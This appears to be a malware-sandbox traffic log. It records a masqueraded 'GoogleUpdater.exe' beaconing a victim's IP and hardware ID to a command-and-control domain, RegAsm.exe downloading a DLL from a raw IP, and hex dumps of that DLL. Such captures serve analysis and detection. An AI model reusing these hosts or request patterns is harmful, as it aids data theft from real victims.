                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: 1c 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00
                                                                                                                                                                                                                                          Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4
                                                                                                                                                                                                                                          Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$
                                                                                                                                                                                                                                          2024-10-02 12:44:55 UTC16384INDELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count(*) FROM %Q.'%q_%s'tokencharsseparatorsL* N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED]
                                                                                                                                                                                                                                          r:Y<|=>MbP?|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED]
                                                                                                                                                                                                                                          i"
                                                                                                                                                                                                                                          i"$i"0i"8i"Di"Pi"\i"hi"
                                                                                                                                                                                                                                          xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"*n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED]
                                                                                                                                                                                                                                          9/I?hKd?81UH!G?#$0|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?*llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!*87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED]
                                                                                                                                                                                                                                          !5ACPRSWYlm pr

                                                                                                                                                                                                                                          )Y*"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          103192.168.2.65863949.12.197.9443340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC192OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:52 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 2459136
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Last-Modified: Wednesday, 02-Oct-2024 12:44:52 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC16120INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC16384INData Raw: d3 b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: 24 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53
                                                                                                                                                                                                                                          Data Ascii: $@:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhS
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: 83 f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35
                                                                                                                                                                                                                                          Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: 89 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e
                                                                                                                                                                                                                                          Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: 8b 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: 24 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: $td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: fe ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14
                                                                                                                                                                                                                                          Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: 1c 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00
                                                                                                                                                                                                                                          Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4
                                                                                                                                                                                                                                          Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$
                                                                                                                                                                                                                                          2024-10-02 12:44:55 UTC16384INDELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count(*) FROM %Q.'%q_%s'tokencharsseparatorsL* N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED]
                                                                                                                                                                                                                                          r:Y<|=>MbP?|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED]
                                                                                                                                                                                                                                          i"
                                                                                                                                                                                                                                          i"$i"0i"8i"Di"Pi"\i"hi"
                                                                                                                                                                                                                                          xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"*n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED]
                                                                                                                                                                                                                                          9/I?hKd?81UH!G?#$0|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?*llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!*87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED]
                                                                                                                                                                                                                                          !5ACPRSWYlm pr

                                                                                                                                                                                                                                          )Y*"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          104192.168.2.658640172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:53 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dztUI4nneO2tcLBX%2FYWEwfquP%2Bx7KeedvW4CkTiIUzAXwdK4LimDgiJa2jbqTVMuUtD1QPkVD4OPp5tH1XexGIL9dy7%2Fg9%2FYej8PvfYa9gmWobriRXrQ4%2B5Q36e0%2F1%2BJ%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c94e0f9e7c93-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          105192.168.2.658642172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:54 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:44:54 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:44:54 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:44:55 UTC603INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:54 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SHt96nK9TElvfOxJjiKzw0dwF5FTHQnIExCZEO4dqPR6LvpkwumyYYASVV4O8ClbSdl3hai%2Fkp3LdrpOV2pUOhIMc4VQt0axR077zy2gPJvt7oTRIHzOMi3oDqsxmDDYZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9574ff141de-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          106192.168.2.65864549.12.197.9443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:56 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA
